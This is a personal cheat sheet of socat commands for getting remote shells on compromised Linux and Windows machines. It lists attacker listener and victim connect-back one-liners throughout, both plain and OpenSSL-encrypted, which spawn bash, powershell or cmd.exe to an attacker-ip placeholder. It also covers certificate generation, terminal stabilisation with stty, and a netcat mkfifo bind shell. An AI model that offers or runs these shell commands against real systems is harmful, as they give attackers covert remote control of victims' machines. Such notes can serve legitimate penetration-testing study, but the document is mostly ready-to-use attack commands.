Socat Cheatsheet - Better netcat

Tool used to establish a more stabilize shell compare to netcat. Features:

• Used of the arrow key
• Allows for interactive commands such as sudo
• Use of CTRL + S, CTRL + C

Reverse Shell for Linux

Attacker:

• socat TCP-L:<port> FILE:tty,raw,echo=0 Victim: socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane

Additional step:

Open a new command prompt, and type stty-a, record the value of rows and columns

Next, in your reverse/bind shell, type: stty rows <number>

note: The number represent the number you recorded. and stty cols <number>

Filling in the numbers you got from running the command in your own terminal.

This will change the registered width and height of the terminal, thus allowing programs such as text editors which rely on such information being accurate to correctly open.

Reverse Shell for Windows

Attacker:

• socat tcp-l:<port> - Victim: If you want spawn a powershell:
• socat tcp:<attacker_ip>:<attacker_port> EXEC:powershell,pipes If you want spawn a command line:
• socat tcp:<attacker_ip>:<attacker_port> EXEC:cmd.exe,pipes

Then refer to the additional step.

Encrypted Shell

1. Generate a Certificate: openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
2. Merge key and cert together: cat shell.key shell.crt > encrypt.pem
3. Decide whether to use a reverse shell vs a blind shell.

Encrypted Reverse Shell for Linux

1. Set up a Listener on the Attacker socat OPENSSL-LISTEN:<port>,cert=encrypt.pem,verify=0 FILE:tty,raw,echo=0

2. Target machine connect back to the Attacker socat OPENSSL:<attacker_ip>:<attacker_port>,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane

3. Refer to the additional step

Encrypted Reverse Shell for Windows

1. Set up a Listener on the Attacker Machine socat OPENSSL-LISTEN:<port>,cert=encrypt.pem,verify=0 -

2. Target machine connect back to the Attacker socat OPENSSL:<attacker_ip>:<attacker_port>,verify=0 -

3. Refer to the additional step

Encrypted Blind Shell for Linux

Note: Blind shell require you moving the .pem to the target

1. Set up a Listener on the Victim socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:/bin/bash

2. Attacker connect to the open port on the victim machine socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -

3. Refer to the additional step

Encrypted Blind Shell for Windows

Note: Blind shell require you moving the .pem to the target

1. Set up a Listener on the Victim socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:powershell,pipes

   If you want the command line: socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes

2. Attacker connect to the open port on the victim machine socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -

3. Refer to the additional step

One tool I found helpful creating reverse-shell and blind shell: https://www.revshells.com/

However, I found the nc Blind to be wrong…. This is what it should be: rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -lvnp [port] > /tmp/f